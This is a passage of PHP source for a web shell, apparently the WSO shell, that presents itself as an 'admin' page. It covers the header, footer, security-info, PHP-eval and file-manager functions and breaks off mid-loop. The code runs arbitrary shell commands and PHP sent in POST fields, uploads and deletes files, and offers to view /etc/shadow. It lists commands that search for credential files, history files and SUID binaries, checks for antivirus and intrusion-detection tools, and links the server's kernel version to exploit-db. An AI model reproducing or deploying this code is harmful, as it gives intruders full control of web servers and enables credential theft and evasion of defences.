$_COOKIE[md5($_SERVER[\'HTTP_HOST\']) . \'ajax\'] = (bool)$default_use_ajax;\n\n if($os == \'win\')\n $aliases = array(\n "List Directory" => "dir",\n "Find index.php in current dir" => "dir /s /w /b index.php",\n "Find *config*.php in current dir" => "dir /s /w /b *config*.php",\n "Show active connections" => "netstat -an",\n "Show running services" => "net start",\n "User accounts" => "net user",\n "Show computers" => "net view",\n "ARP Table" => "arp -a",\n "IP Configuration" => "ipconfig /all"\n );\n else\n $aliases = array(\n "List dir" => "ls -lha",\n "list file attributes on a Linux second extended file system" => "lsattr -va",\n "show opened ports" => "netstat -an | grep -i listen",\n "process status" => "ps aux",\n "Find" => "",\n "find all suid files" => "find / -type f -perm -04000 -ls",\n "find suid files in current dir" => "find . -type f -perm -04000 -ls",\n "find all sgid files" => "find / -type f -perm -02000 -ls",\n "find sgid files in current dir" => "find . -type f -perm -02000 -ls",\n "find config.inc.php files" => "find / -type f -name config.inc.php",\n "find config* files" => "find / -type f -name \\"config*\\"",\n "find config* files in current dir" => "find . -type f -name \\"config*\\"",\n "find all writable folders and files" => "find / -perm -2 -ls",\n "find all writable folders and files in current dir" => "find . -perm -2 -ls",\n "find all service.pwd files" => "find / -type f -name service.pwd",\n "find service.pwd files in current dir" => "find . -type f -name service.pwd",\n "find all .htpasswd files" => "find / -type f -name .htpasswd",\n "find .htpasswd files in current dir" => "find . -type f -name .htpasswd",\n "find all .bash_history files" => "find / -type f -name .bash_history",\n "find .bash_history files in current dir" => "find . -type f -name .bash_history",\n "find all .fetchmailrc files" => "find / -type f -name .fetchmailrc",\n "find .fetchmailrc files in current dir" => "find . -type f -name .fetchmailrc",\n "Locate" => "",\n "locate httpd.conf files" => "locate httpd.conf",\n "locate vhosts.conf files" => "locate vhosts.conf",\n "locate proftpd.conf files" => "locate proftpd.conf",\n "locate psybnc.conf files" => "locate psybnc.conf",\n "locate my.conf files" => "locate my.conf",\n "locate admin.php files" =>"locate admin.php",\n "locate cfg.php files" => "locate cfg.php",\n "locate conf.php files" => "locate conf.php",\n "locate config.dat files" => "locate config.dat",\n "locate config.php files" => "locate config.php",\n "locate config.inc files" => "locate config.inc",\n "locate config.inc.php" => "locate config.inc.php",\n "locate config.default.php files" => "locate config.default.php",\n "locate config* files " => "locate config",\n "locate .conf files"=>"locate \'.conf\'",\n "locate .pwd files" => "locate \'.pwd\'",\n "locate .sql files" => "locate \'.sql\'",\n "locate .htpasswd files" => "locate \'.htpasswd\'",\n "locate .bash_history files" => "locate \'.bash_history\'",\n "locate .mysql_history files" => "locate \'.mysql_history\'",\n "locate .fetchmailrc files" => "locate \'.fetchmailrc\'",\n "locate backup files" => "locate backup",\n "locate dump files" => "locate dump",\n "locate priv files" => "locate priv"\n );\n\n function wsoHeader() {\n if(empty($_POST[\'charset\']))\n $_POST[\'charset\'] = $GLOBALS[\'default_charset\'];\n global $color;\n echo "<html><head><meta http-equiv=\'Content-Type\' content=\'text/html; charset=" . $_POST[\'charset\'] . "\'><title>" . $_SERVER[\'HTTP_HOST\'] . " - admin </title>\n\t<style>\n\tbody{background-color:#445;color:#e2e2e2;}\n\tbody,td,th{ font: 9pt Lucida,Verdana;margin:0;vertical-align:top;color:#e1e1e1; }\n\ttable.info{ color:#fff;background-color:#222; }\n\tspan,h1,a{ color: $color !important; }\n\tspan{ font-weight: bolder; }\n\th1{ border-left:5px solid $color;padding: 2px 5px;font: 14pt Verdana;background-color:#222;margin:0px; }\n\tdiv.content{ padding: 5.5px;margin-left:5.5px;background-color:#444; }\n\ta{ text-decoration:none; }\n\ta:hover{ text-decoration:underline; }\n\t.ml_one_area{ border:1px solid #444;padding:5px;margin:0;overflow: auto; }\n\t.area_main{ width:100%;height:300px; }\n\tinput,textarea,select{ margin:0;color:#fff;background-color:#555;border:1px solid $color; font: 9.5pt Monospace,\'Courier New\'; }\n\tform{ margin:0px; }\n\t#tools_table_area{ text-align:center; }\n\t.tools_inp_area{ width: 300px }\n\t.main th{text-align:left;background-color:#5e5e5e;}\n\t.main tr:hover{background-color:#5e5e5e}\n\t.l_one_area{background-color:#444}\n\t.l_two_area{background-color:#333}\n\t</style>\n\t<script>\n\t var c_ = \'" . htmlspecialchars($GLOBALS[\'cwd\']) . "\';\n\t var a_ = \'" . htmlspecialchars(@$_POST[\'a\']) ."\'\n\t var charset_ = \'" . htmlspecialchars(@$_POST[\'charset\']) ."\';\n\t var p1_ = \'" . ((strpos(@$_POST[\'p1\'],"\\n")!==false)?\'\':htmlspecialchars($_POST[\'p1\'],ENT_QUOTES)) ."\';\n\t var p2_ = \'" . ((strpos(@$_POST[\'p2\'],"\\n")!==false)?\'\':htmlspecialchars($_POST[\'p2\'],ENT_QUOTES)) ."\';\n\t var p3_ = \'" . ((strpos(@$_POST[\'p3\'],"\\n")!==false)?\'\':htmlspecialchars($_POST[\'p3\'],ENT_QUOTES)) ."\';\n\t var d = document;\n\t\tfunction set(a,c,p1,p2,p3,charset) {\n\t\t\tif(a!=null)d.mf.a.value=a;else d.mf.a.value=a_;\n\t\t\tif(c!=null)d.mf.c.value=c;else d.mf.c.value=c_;\n\t\t\tif(p1!=null)d.mf.p1.value=p1;else d.mf.p1.value=p1_;\n\t\t\tif(p2!=null)d.mf.p2.value=p2;else d.mf.p2.value=p2_;\n\t\t\tif(p3!=null)d.mf.p3.value=p3;else d.mf.p3.value=p3_;\n\t\t\tif(charset!=null)d.mf.charset.value=charset;else d.mf.charset.value=charset_;\n\t\t}\n\t\tfunction g(a,c,p1,p2,p3,charset) {\n\t\t\tset(a,c,p1,p2,p3,charset);\n\t\t\td.mf.submit();\n\t\t}\n\t\tfunction a(a,c,p1,p2,p3,charset) {\n\t\t\tset(a,c,p1,p2,p3,charset);\n\t\t\tvar params = \'ajax=true\';\n\t\t\tfor(i=0;i<d.mf.elements.length;i++)\n\t\t\t\tparams += \'&\'+d.mf.elements[i].name+\'=\'+encodeURIComponent(d.mf.elements[i].value);\n\t\t\tsr(\'" . addslashes($_SERVER[\'REQUEST_URI\']) ."\', params);\n\t\t}\n\t\tfunction sr(url, params) {\n\t\t\tif (window.XMLHttpRequest)\n\t\t\t\treq = new XMLHttpRequest();\n\t\t\telse if (window.ActiveXObject)\n\t\t\t\treq = new ActiveXObject(\'Microsoft.XMLHTTP\');\n\t if (req) {\n\t req.onreadystatechange = processReqChange;\n\t req.open(\'POST\', url, true);\n\t req.setRequestHeader (\'Content-Type\', \'application/x-www-form-urlencoded\');\n\t req.send(params);\n\t }\n\t\t}\n\t\tfunction processReqChange() {\n\t\t\tif( (req.readyState == 4) )\n\t\t\t\tif(req.status == 200) {\n\t\t\t\t\tvar reg = new RegExp(\\"(\\\\\\\\d+)([\\\\\\\\S\\\\\\\\s]*)\\", \'m\');\n\t\t\t\t\tvar arr=reg.exec(req.responseText);\n\t\t\t\t\teval(arr[2].substr(0, arr[1]));\n\t\t\t\t} else alert(\'Request error!\');\n\t\t}\n\t</script>\n\t<head><body><div id=\'main_default\' style=\'display:block;position:absolute;width:100%;background-color:#555;top:0;left:0;\'>\n\t<form method=post name=mf style=\'display:none;\'>\n\t<input type=hidden name=a>\n\t<input type=hidden name=c>\n\t<input type=hidden name=p1>\n\t<input type=hidden name=p2>\n\t<input type=hidden name=p3>\n\t<input type=hidden name=charset>\n\t</form>";\n $freeSpace = @diskfreespace($GLOBALS[\'cwd\']);\n $totalSpace = @disk_total_space($GLOBALS[\'cwd\']);\n $totalSpace = $totalSpace?$totalSpace:1;\n $release = @php_uname(\'r\');\n $kernel = @php_uname(\'s\');\n $explink = \'http://exploit-db.com/search/?action=search&filter_description=\';\n if(strpos(\'Linux\', $kernel) !== false)\n $explink .= urlencode(\'Linux Kernel \' . substr($release,0,6));\n else\n $explink .= urlencode($kernel . \' \' . substr($release,0,3));\n if(!function_exists(\'posix_getegid\')) {\n $user = @get_current_user();\n $uid = @getmyuid();\n $gid = @getmygid();\n $group = "?";\n } else {\n $uid = @posix_getpwuid(posix_geteuid());\n $gid = @posix_getgrgid(posix_getegid());\n $user = $uid[\'name\'];\n $uid = $uid[\'uid\'];\n $group = $gid[\'name\'];\n $gid = $gid[\'gid\'];\n }\n\n $cwd_links = \'\';\n $path = explode("/", $GLOBALS[\'cwd\']);\n $n=count($path);\n for($i=0; $i<$n-1; $i++) {\n $cwd_links .= "<a href=\'#\' onclick=\'g(\\"ff_man\\",\\"";\n for($j=0; $j<=$i; $j++)\n $cwd_links .= $path[$j].\'/\';\n $cwd_links .= "\\")\'>".$path[$i]."/</a>";\n }\n\n $charsets = array(\'UTF-8\', \'Windows-1251\', \'KOI8-R\', \'KOI8-U\', \'cp866\');\n $opt_charsets = \'\';\n foreach($charsets as $item)\n $opt_charsets .= \'<option value="\'.$item.\'" \'.($_POST[\'charset\']==$item?\'selected\':\'\').\'>\'.$item.\'</option>\';\n\n $m = array(\'Sec. Info\'=>\'SecInfo\',\'Files\'=>\'ff_man\',\'Console\'=>\'Console\',\'Sql\'=>\'Sql\',\'Php\'=>\'Php\',\'String tools\'=>\'StringTools\',\'Bruteforce\'=>\'Bruteforce\',\'Network\'=>\'Network\');\n if(!empty($GLOBALS[\'auth_pass\']))\n $m[\'Logout\'] = \'Logout\';\n $m[\'Self remove\'] = \'SelfRemove\';\n $menu = \'\';\n foreach($m as $k => $v)\n $menu .= \'<th width="\'.(int)(100/count($m)).\'%">[ <a href="#" onclick="g(\\\'\'.$v.\'\\\',null,\\\'\\\',\\\'\\\',\\\'\\\')">\'.$k.\'</a> ]</th>\';\n\n $drives = "";\n if($GLOBALS[\'os\'] == \'win\') {\n foreach(range(\'c\',\'z\') as $drive)\n if(is_dir($drive.\':\\\\\'))\n $drives .= \'<a href="#" onclick="g(\\\'ff_man\\\',\\\'\'.$drive.\':/\\\')">[ \'.$drive.\' ]</a> \';\n }\n echo \'<table class=info cellpadding=3 cellspacing=0 width=100%><tr><td width=1><span>Uname:<br>User:<br>Php:<br>Hdd:<br>Cwd:\' . ($GLOBALS[\'os\'] == \'win\'?\'<br>Drives:\':\'\') . \'</span></td>\'\n . \'<td><nobr>\' . substr(@php_uname(), 0, 120) . \' <a href="\' . $explink . \'" target=_blank>[exploit-db.com]</a></nobr><br>\' . $uid . \' ( \' . $user . \' ) <span>Group:</span> \' . $gid . \' ( \' . $group . \' )<br>\' . @phpversion() . \' <span>Safe mode:</span> \' . ($GLOBALS[\'safe_mode\']?\'<font color=red>ON</font>\':\'<font color=green><b>OFF</b></font>\')\n . \' <a href=# onclick="g(\\\'Php\\\',null,\\\'\\\',\\\'info\\\')">[ phpinfo ]</a> <span>Datetime:</span> \' . date(\'Y-m-d H:i:s\') . \'<br>\' . wsoViewSize($totalSpace) . \' <span>Free:</span> \' . wsoViewSize($freeSpace) . \' (\'. (int) ($freeSpace/$totalSpace*100) . \'%)<br>\' . $cwd_links . \' \'. wsoPermsColor($GLOBALS[\'cwd\']) . \' <a href=# onclick="g(\\\'ff_man\\\',\\\'\' . $GLOBALS[\'home_cwd\'] . \'\\\',\\\'\\\',\\\'\\\',\\\'\\\')">[ home ]</a><br>\' . $drives . \'</td>\'\n . \'<td width=1 align=right><nobr><select onchange="g(null,null,null,null,null,this.value)"><optgroup label="Page charset">\' . $opt_charsets . \'</optgroup></select><br><span>Server IP:</span><br>\' . @$_SERVER["SERVER_ADDR"] . \'<br><span>Client IP:</span><br>\' . $_SERVER[\'REMOTE_ADDR\'] . \'</nobr></td></tr></table>\'\n . \'<table style="border-top:2px solid #333;" cellpadding=3 cellspacing=0 width=100%><tr>\' . $menu . \'</tr></table><div style="margin:5">\';\n }\n\n function wsoFooter() {\n $is_writable = is_writable($GLOBALS[\'cwd\'])?" <font color=\'green\'></font>":"Yes<font color=red>(Not)</font>";\n echo "\n\t</div>\n\t<table class=info id=tools_table_area cellpadding=3 cellspacing=0 width=100% style=\'border-top:2px solid #333;border-bottom:2px solid #333;\'>\n\t\t<tr>\n\t\t\t<td><form onsubmit=\'g(null,this.c.value,\\"\\");return false;\'><span>ch:</span><br><input class=\'tools_inp_area\' type=text name=c value=\'" . htmlspecialchars($GLOBALS[\'cwd\']) ."\'><input type=submit value=\'>>\'></form></td>\n\t\t\t<td><form onsubmit=\\"g(\'ff_tools\',null,this.f.value);return false;\\"><span>Read file:</span><br><input class=\'tools_inp_area\' type=text name=f><input type=submit value=\'>>\'></form></td>\n\t\t</tr><tr>\n\t\t\t<td><form onsubmit=\\"g(\'ff_man\',null,\'mkdir\',this.d.value);return false;\\"><span>mdir:</span>$is_writable<br><input class=\'tools_inp_area\' type=text name=d><input type=submit value=\'>>\'></form></td>\n\t\t\t<td><form onsubmit=\\"g(\'ff_tools\',null,this.f.value,\'mkfile\');return false;\\"><span>Mfile:</span>$is_writable<br><input class=\'tools_inp_area\' type=text name=f><input type=submit value=\'>>\'></form></td>\n\t\t</tr><tr>\n\t\t\t<td><form onsubmit=\\"g(\'cns\',null,this.c.value);return false;\\"><span>ex:</span><br><input class=\'tools_inp_area\' type=text name=c value=\'\'><input type=submit value=\'>>\'></form></td>\n\t\t\t<td><form method=\'post\' ENCTYPE=\'multipart/form-data\'>\n\t\t\t<input type=hidden name=a value=\'ff_man\'>\n\t\t\t<input type=hidden name=c value=\'" . $GLOBALS[\'cwd\'] ."\'>\n\t\t\t<input type=hidden name=p1 value=\'uploadFile\'>\n\t\t\t<input type=hidden name=charset value=\'" . (isset($_POST[\'charset\'])?$_POST[\'charset\']:\'\') . "\'>\n\t\t\t<span>Upload file:</span>$is_writable<br><input class=\'tools_inp_area\' type=file name=f><input type=submit value=\'>>\'></form><br ></td>\n\t\t</tr></table></div></body></html>";\n }\n\n if (!function_exists("posix_getpwuid") && (strpos($GLOBALS[\'disable_functions\'], \'posix_getpwuid\')===false)) {\n function posix_getpwuid($p) {return false;} }\n if (!function_exists("posix_getgrgid") && (strpos($GLOBALS[\'disable_functions\'], \'posix_getgrgid\')===false)) {\n function posix_getgrgid($p) {return false;} }\n\n function wsoEx($in) {\n $out = \'\';\n if (function_exists(\'exec\')) {\n @exec($in,$out);\n $out = @join("\\n",$out);\n } elseif (function_exists(\'passthru\')) {\n ob_start();\n @passthru($in);\n $out = ob_get_clean();\n } elseif (function_exists(\'system\')) {\n ob_start();\n @system($in);\n $out = ob_get_clean();\n } elseif (function_exists(\'shell_exec\')) {\n $out = shell_exec($in);\n } elseif (is_resource($f = @popen($in,"r"))) {\n $out = "";\n while(!@feof($f))\n $out .= fread($f,1024);\n pclose($f);\n }\n return $out;\n }\n\n function wsoViewSize($s) {\n if (is_int($s))\n $s = sprintf("%u", $s);\n\n if($s >= 1073741824)\n return sprintf(\'%1.2f\', $s / 1073741824 ). \' GB\';\n elseif($s >= 1048576)\n return sprintf(\'%1.2f\', $s / 1048576 ) . \' MB\';\n elseif($s >= 1024)\n return sprintf(\'%1.2f\', $s / 1024 ) . \' KB\';\n else\n return $s . \' B\';\n }\n\n function wsoPerms($p) {\n if (($p & 0xC000) == 0xC000)$i = \'s\';\n elseif (($p & 0xA000) == 0xA000)$i = \'l\';\n elseif (($p & 0x8000) == 0x8000)$i = \'-\';\n elseif (($p & 0x6000) == 0x6000)$i = \'b\';\n elseif (($p & 0x4000) == 0x4000)$i = \'d\';\n elseif (($p & 0x2000) == 0x2000)$i = \'c\';\n elseif (($p & 0x1000) == 0x1000)$i = \'p\';\n else $i = \'u\';\n $i .= (($p & 0x0100) ? \'r\' : \'-\');\n $i .= (($p & 0x0080) ? \'w\' : \'-\');\n $i .= (($p & 0x0040) ? (($p & 0x0800) ? \'s\' : \'x\' ) : (($p & 0x0800) ? \'S\' : \'-\'));\n $i .= (($p & 0x0020) ? \'r\' : \'-\');\n $i .= (($p & 0x0010) ? \'w\' : \'-\');\n $i .= (($p & 0x0008) ? (($p & 0x0400) ? \'s\' : \'x\' ) : (($p & 0x0400) ? \'S\' : \'-\'));\n $i .= (($p & 0x0004) ? \'r\' : \'-\');\n $i .= (($p & 0x0002) ? \'w\' : \'-\');\n $i .= (($p & 0x0001) ? (($p & 0x0200) ? \'t\' : \'x\' ) : (($p & 0x0200) ? \'T\' : \'-\'));\n return $i;\n }\n\n function wsoPermsColor($f) {\n if (!@is_readable($f))\n return \'<font color=#FF0000>\' . wsoPerms(@fileperms($f)) . \'</font>\';\n elseif (!@is_writable($f))\n return \'<font color=white>\' . wsoPerms(@fileperms($f)) . \'</font>\';\n else\n return \'<font color=#25ff00>\' . wsoPerms(@fileperms($f)) . \'</font>\';\n }\n\n function wsoScandir($dir) {\n if(function_exists("scandir")) {\n return scandir($dir);\n } else {\n $dh = opendir($dir);\n while (false !== ($filename = readdir($dh)))\n $files[] = $filename;\n return $files;\n }\n }\n\n function wsoWhich($p) {\n $path = wsoEx(\'which \' . $p);\n if(!empty($path))\n return $path;\n return false;\n }\n\n function actionSecInfo() {\n wsoHeader();\n echo \'<h1>Server security information</h1><div class=content>\';\n function wsoSecParam($n, $v) {\n $v = trim($v);\n if($v) {\n echo \'<span>\' . $n . \': </span>\';\n if(strpos($v, "\\n") === false)\n echo $v . \'<br>\';\n else\n echo \'<pre class=ml_one_area>\' . $v . \'</pre>\';\n }\n }\n\n wsoSecParam(\'Server software\', @getenv(\'SERVER_SOFTWARE\'));\n if(function_exists(\'apache_get_modules\'))\n wsoSecParam(\'Loaded Apache modules\', implode(\', \', apache_get_modules()));\n wsoSecParam(\'Disabled PHP Functions\', $GLOBALS[\'disable_functions\']?$GLOBALS[\'disable_functions\']:\'none\');\n wsoSecParam(\'Open base dir\', @ini_get(\'open_basedir\'));\n wsoSecParam(\'Safe mode exec dir\', @ini_get(\'safe_mode_exec_dir\'));\n wsoSecParam(\'Safe mode include dir\', @ini_get(\'safe_mode_include_dir\'));\n wsoSecParam(\'cURL support\', function_exists(\'curl_version\')?\'enabled\':\'no\');\n $temp=array();\n if(function_exists(\'mysql_get_client_info\'))\n $temp[] = "MySql (".mysql_get_client_info().")";\n if(function_exists(\'mssql_connect\'))\n $temp[] = "MSSQL";\n if(function_exists(\'pg_connect\'))\n $temp[] = "PostgreSQL";\n if(function_exists(\'oci_connect\'))\n $temp[] = "Oracle";\n wsoSecParam(\'Supported databases\', implode(\', \', $temp));\n echo \'<br>\';\n\n if($GLOBALS[\'os\'] == \'nix\') {\n wsoSecParam(\'Readable /etc/passwd\', @is_readable(\'/etc/passwd\')?"yes <a href=\'#\' onclick=\'g(\\"ff_tools\\", \\"/etc/\\", \\"passwd\\")\'>[view]</a>":\'no\');\n wsoSecParam(\'Readable /etc/shadow\', @is_readable(\'/etc/shadow\')?"yes <a href=\'#\' onclick=\'g(\\"ff_tools\\", \\"/etc/\\", \\"shadow\\")\'>[view]</a>":\'no\');\n wsoSecParam(\'OS version\', @file_get_contents(\'/proc/version\'));\n wsoSecParam(\'Distr name\', @file_get_contents(\'/etc/issue.net\'));\n if(!$GLOBALS[\'safe_mode\']) {\n $userful = array(\'gcc\',\'lcc\',\'cc\',\'ld\',\'make\',\'php\',\'perl\',\'python\',\'ruby\',\'tar\',\'gzip\',\'bzip\',\'bzip2\',\'nc\',\'locate\',\'suidperl\');\n $danger = array(\'kav\',\'nod32\',\'bdcored\',\'uvscan\',\'sav\',\'drwebd\',\'clamd\',\'rkhunter\',\'chkrootkit\',\'iptables\',\'ipfw\',\'tripwire\',\'shieldcc\',\'portsentry\',\'snort\',\'ossec\',\'lidsadm\',\'tcplodg\',\'sxid\',\'logcheck\',\'logwatch\',\'sysmask\',\'zmbscap\',\'sawmill\',\'wormscan\',\'ninja\');\n $downloaders = array(\'wget\',\'fetch\',\'lynx\',\'links\',\'curl\',\'get\',\'lwp-mirror\');\n echo \'<br>\';\n $temp=array();\n foreach ($userful as $item)\n if(wsoWhich($item))\n $temp[] = $item;\n wsoSecParam(\'Userful\', implode(\', \',$temp));\n $temp=array();\n foreach ($danger as $item)\n if(wsoWhich($item))\n $temp[] = $item;\n wsoSecParam(\'Danger\', implode(\', \',$temp));\n $temp=array();\n foreach ($downloaders as $item)\n if(wsoWhich($item))\n $temp[] = $item;\n wsoSecParam(\'Downloaders\', implode(\', \',$temp));\n echo \'<br/>\';\n wsoSecParam(\'HDD space\', wsoEx(\'df -h\'));\n wsoSecParam(\'Hosts\', @file_get_contents(\'/etc/hosts\'));\n echo \'<br/><span>posix_getpwuid ("Read" /etc/passwd)</span><table><form onsubmit=\\\'g(null,null,"5",this.param1.value,this.param2.value);return false;\\\'><tr><td>From</td><td><input type=text name=param1 value=0></td></tr><tr><td>To</td><td><input type=text name=param2 value=1000></td></tr></table><input type=submit value=">>"></form>\';\n if (isset ($_POST[\'p2\'], $_POST[\'p3\']) && is_numeric($_POST[\'p2\']) && is_numeric($_POST[\'p3\'])) {\n $temp = "";\n for(;$_POST[\'p2\'] <= $_POST[\'p3\'];$_POST[\'p2\']++) {\n $uid = @posix_getpwuid($_POST[\'p2\']);\n if ($uid)\n $temp .= join(\':\',$uid)."\\n";\n }\n echo \'<br/>\';\n wsoSecParam(\'Users\', $temp);\n }\n }\n } else {\n wsoSecParam(\'OS Version\',wsoEx(\'ver\'));\n wsoSecParam(\'Account Settings\',wsoEx(\'net accounts\'));\n wsoSecParam(\'User Accounts\',wsoEx(\'net user\'));\n }\n echo \'</div>\';\n wsoFooter();\n }\n\n function actionPhp() {\n if(isset($_POST[\'ajax\'])) {\n WSOsetcookie(md5($_SERVER[\'HTTP_HOST\']) . \'ajax\', true);\n ob_start();\n eval($_POST[\'p1\']);\n $temp = "document.getElementById(\'PhpOutput\').style.display=\'\';document.getElementById(\'PhpOutput\').innerHTML=\'" . addcslashes(htmlspecialchars(ob_get_clean()), "\\n\\r\\t\\\\\'\\0") . "\';\\n";\n echo strlen($temp), "\\n", $temp;\n exit;\n }\n if(empty($_POST[\'ajax\']) && !empty($_POST[\'p1\']))\n WSOsetcookie(md5($_SERVER[\'HTTP_HOST\']) . \'ajax\', 0);\n\n wsoHeader();\n if(isset($_POST[\'p2\']) && ($_POST[\'p2\'] == \'info\')) {\n echo \'<h1>PHP info</h1><div class=content><style>.p {color:#000;}</style>\';\n ob_start();\n phpinfo();\n $tmp = ob_get_clean();\n $tmp = preg_replace(array (\n \'!(body|a:\\w+|body, td, th, h1, h2) {.*}!msiU\',\n \'!td, th {(.*)}!msiU\',\n \'!<img[^>]+>!msiU\',\n ), array (\n \'\',\n \'.e, .v, .h, .h th {$1}\',\n \'\'\n ), $tmp);\n echo str_replace(\'<h1\',\'<h2\', $tmp) .\'</div><br>\';\n }\n echo \'<h1>Execution PHP-code</h1><div class=content><form name=pf method=post onsubmit="if(this.ajax.checked){a(\\\'Php\\\',null,this.code.value);}else{g(\\\'Php\\\',null,this.code.value,\\\'\\\');}return false;"><textarea name=code class=area_main id=PhpCode>\'.(!empty($_POST[\'p1\'])?htmlspecialchars($_POST[\'p1\']):\'\').\'</textarea><input type=submit value=Eval style="margin-top:5px">\';\n echo \' <input type=checkbox name=ajax value=1 \'.($_COOKIE[md5($_SERVER[\'HTTP_HOST\']).\'ajax\']?\'checked\':\'\').\'> send using AJAX</form><pre id=PhpOutput style="\'.(empty($_POST[\'p1\'])?\'display:none;\':\'\').\'margin-top:5px;" class=ml_one_area>\';\n if(!empty($_POST[\'p1\'])) {\n ob_start();\n eval($_POST[\'p1\']);\n echo htmlspecialchars(ob_get_clean());\n }\n echo \'</pre></div>\';\n wsoFooter();\n }\n\n function actionff_man() {\n if (!empty ($_COOKIE[\'f\']))\n $_COOKIE[\'f\'] = @unserialize($_COOKIE[\'f\']);\n\n if(!empty($_POST[\'p1\'])) {\n switch($_POST[\'p1\']) {\n case \'uploadFile\':\n if(!@move_uploaded_file($_FILES[\'f\'][\'tmp_name\'], $_FILES[\'f\'][\'name\']))\n echo "Can\'t upload file!";\n break;\n case \'mkdir\':\n if(!@mkdir($_POST[\'p2\']))\n echo "Can\'t create new dir";\n break;\n case \'delete\':\n function deleteDir($path) {\n $path = (substr($path,-1)==\'/\') ? $path:$path.\'/\';\n $dh = opendir($path);\n while ( ($item = readdir($dh) ) !== false) {\n $item = $path.$item;\n if ( (basename($item) == "..") || (basename($item) == ".") )\n continue;\n $type = filetype($item);\n if ($type == "dir")\n deleteDir($item);\n else\n @unlink($item);\n }\n closedir($dh);\n @rmdir($path);\n }\n if(is_array(@$_POST[\'f\']))\n foreach($_POST[\'f\'] as $f) {\n if($f == \'..\')\n continue;\n $f = urldecode($f);\n if(is_dir($f))\n deleteDir($f);\n else\n @unlink($f);\n }\n break;\n case \'paste\':\n if($_COOKIE[\'act\'] == \'copy\') {\n function copy_paste($c,$s,$d){\n if(is_dir($c.$s)){\n mkdir($d.$s);\n $h = @opendir($c.$s);\n while (($f = @readdir($h)) !== false)\n if (($f != ".") and ($f != ".."))\n copy_paste($c.$s.\'/\',$f, $d.$s.\'/\');\n } elseif(is_file($c.$s))\n @copy($c.$s, $d.$s);\n }\n foreach($_COOKIE[\'f\'] as $f)\n copy_paste($_COOKIE[\'c\'],$f, $GLOBALS[\'cwd\']);\n } elseif($_COOKIE[\'act\'] == \'move\') {\n function move_paste($c,$s,$d){\n if(is_dir($c.$s)){\n mkdir($d.$s);\n $h = @opendir($c.$s);\n while (($f = @readdir($h)) !== false)\n if (($f != ".") and ($f != ".."))\n copy_paste($c.$s.\'/\',$f, $d.$s.\'/\');\n } elseif(@is_file($c.$s))\n @copy($c.$s, $d.$s);\n }\n foreach($_COOKIE[\'f\'] as $f)\n @rename($_COOKIE[\'c\'].$f, $GLOBALS[\'cwd\'].$f);\n } elseif($_COOKIE[\'act\'] == \'zip\') {\n if(class_exists(\'ZipArchive\')) {\n $zip = new ZipArchive();\n if ($zip->open($_POST[\'p2\'], 1)) {\n chdir($_COOKIE[\'c\']);\n foreach($_COOKIE[\'f\'] as $f) {\n if($f == \'..\')\n continue;\n if(@is_file($_COOKIE[\'c\'].$f))\n $zip->addFile($_COOKIE[\'c\'].$f, $f);\n elseif(@is_dir($_COOKIE[\'c\'].$f)) {\n $iterator = new RecursiveIteratorIterator(new RecursiveDirectoryIterator($f.\'/\', FilesystemIterator::SKIP_DOTS));\n foreach ($iterator as $key=>$value) {\n $zip->addFile(realpath($key), $key);\n }\n }\n }\n chdir($GLOBALS[\'cwd\']);\n $zip->close();\n }\n }\n } elseif($_COOKIE[\'act\'] == \'unzip\') {\n if(class_exists(\'ZipArchive\')) {\n $zip = new ZipArchive();\n foreach($_COOKIE[\'f\'] as $f) {\n if($zip->open($_COOKIE[\'c\'].$f)) {\n $zip->extractTo($GLOBALS[\'cwd\']);\n $zip->close();\n }\n }\n }\n } elseif($_COOKIE[\'act\'] == \'tar\') {\n chdir($_COOKIE[\'c\']);\n $_COOKIE[\'f\'] = array_map(\'escapeshellarg\', $_COOKIE[\'f\']);\n wsoEx(\'tar cfzv \' . escapeshellarg($_POST[\'p2\']) . \' \' . implode(\' \', $_COOKIE[\'f\']));\n chdir($GLOBALS[\'cwd\']);\n }\n unset($_COOKIE[\'f\']);\n setcookie(\'f\', \'\', time() - 3600);\n break;\n default:\n if(!empty($_POST[\'p1\'])) {\n WSOsetcookie(\'act\', $_POST[\'p1\']);\n WSOsetcookie(\'f\', serialize(@$_POST[\'f\']));\n WSOsetcookie(\'c\', @$_POST[\'c\']);\n }\n break;\n }\n }\n wsoHeader();\n echo \'<h1>File manager</h1><div class=content><script>p1_=p2_=p3_="";</script>\';\n $dirContent = wsoScandir(isset($_POST[\'c\'])?$_POST[\'c\']:$GLOBALS[\'cwd\']);\n if($dirContent === false) {\techo \'Can\\\'t open this folder!\';wsoFooter(); return; }\n global $sort;\n $sort = array(\'name\', 1);\n if(!empty($_POST[\'p1\'])) {\n if(preg_match(\'!s_([A-z]+)_(\\d{1})!\', $_POST[\'p1\'], $match))\n $sort = array($match[1], (int)$match[2]);\n }\n echo "<script>\n\t\tfunction sa() {\n\t\t\tfor(i=0;i<d.files.elements.length;i++)\n\t\t\t\tif(d.files.elements[i].type == \'checkbox\')\n\t\t\t\t\td.files.elements[i].checked = d.files.elements[0].checked;\n\t\t}\n\t</script>\n\t<table width=\'100%\' class=\'main\' cellspacing=\'0\' cellpadding=\'2\'>\n\t<form name=files method=post><tr><th width=\'13px\'><input type=checkbox onclick=\'sa()\' class=chkbx></th><th><a href=\'#\' onclick=\'g(\\"ff_man\\",null,\\"s_name_".($sort[1]?0:1)."\\")\'>Name</a></th><th><a href=\'#\' onclick=\'g(\\"ff_man\\",null,\\"s_size_".($sort[1]?0:1)."\\")\'>Size</a></th><th><a href=\'#\' onclick=\'g(\\"ff_man\\",null,\\"s_modify_".($sort[1]?0:1)."\\")\'>Modify</a></th><th>Owner/Group</th><th><a href=\'#\' onclick=\'g(\\"ff_man\\",null,\\"s_perms_".($sort[1]?0:1)."\\")\'>Permissions</a></th><th>Actions</th></tr>";\n $dirs = $files = array();\n $n = count($dirContent);\n for($i=0;$i<$n;$i++) {\n $ow = @posix_getpwuid(@fileowner($dirContent[$i]));\n $gr = @posix_getgrgid(@filegroup($dirContent[$i]));\n $tmp = array(\'name\' => $dirContent[$i],\n \'path\' => $GLOBALS[\'cwd\'].$dirContent[$i],\n \'modify\' => date(\'Y-m-d H:i:s\', @filemtime($GLOBALS[\'cwd\'] . $dirContent[$i])),\n \'perms\' => wsoPermsColor($GLOBALS[\'cwd\'] . $dirContent[$i]),\n \'size\' => @filesize($GLOBALS[\'cwd\'].$dirContent[$i]),\n \'owner\' => $ow[\'name\']?$ow[\'name\']:@fileowner($dirContent[$i]),\n \'group\' => $gr[\'name\']?$gr[\'name\']:@filegroup($dirContent[$i])\n );\n if(@is_file($GLOBALS[\'cwd\'] . $dirContent[$i]))\n $files[] = array_merge($tmp, array(\'type\' => \'file\'));\n 